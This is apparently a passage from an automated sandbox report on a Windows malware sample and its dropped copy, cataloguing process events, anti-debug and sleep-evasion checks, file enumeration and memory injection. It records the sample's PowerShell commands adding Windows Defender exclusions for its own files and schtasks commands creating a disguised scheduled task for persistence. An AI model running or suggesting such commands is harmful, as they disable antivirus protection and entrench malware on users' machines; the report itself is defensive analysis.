            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 5584, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040E18D Sleep,ExitProcess,16_2_0040E18D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: 2D70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: 2F90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: 83A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: 93A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: 9570000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Memory allocated: A570000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 27A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 2960000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 4960000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 7860000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 8860000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 8A10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Memory allocated: 9A10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,16_2_004186FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6139
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6237
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Window / User API: threadDelayed 4752
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe Window / User API: threadDelayed 5241
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe API coverage: 5.1 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4704 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep count: 6139 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1172 Thread sleep count: 224 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4928 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492 Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4244 Thread sleep time: -14256000s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe TID: 4244 Thread sleep time: -15723000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe TID: 336 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_0041A01B
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,16_2_0040B28E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_0040838E
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_004087A0
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,16_2_00407848
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_004068CD FindFirstFileW,FindNextFileW,16_2_004068CD
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0044BA59 FindFirstFileExA,16_2_0044BA59
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0040AA71
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,16_2_00417AAB
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0040AC78
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe Code function: 16_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,16_2_00406D28
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4039686667.000000000108A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004327AE
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041A8DA
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004407B5 mov eax, dword ptr fs:[00000030h]16_2_004407B5
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,16_2_00410763
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004327AE
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004328FC SetUnhandledExceptionFilter,16_2_004328FC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_004398AC
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00432D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Memory written: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe16_2_00410B5C
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004175E1 mouse_event,16_2_004175E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Process created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager&
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]Program Manager
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4039686667.0000000001083000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GProgram Managery2
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dProgram Managerenh.dllllK
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GProgram Managerg
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GProgram ManagerG
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <Program Manager1279140920l
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Program Manager
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [Program Manager{
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004329DA cpuid 16_2_004329DA
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: EnumSystemLocalesW,16_2_0044F17B
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: EnumSystemLocalesW,16_2_0044F130
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: EnumSystemLocalesW,16_2_0044F216
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,16_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoA,16_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoW,16_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_0044F61C
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoW,16_2_0044F723
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: EnumSystemLocalesW,16_2_00445914
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: GetLocaleInfoW,16_2_00445E1C
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,16_2_0044EEB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
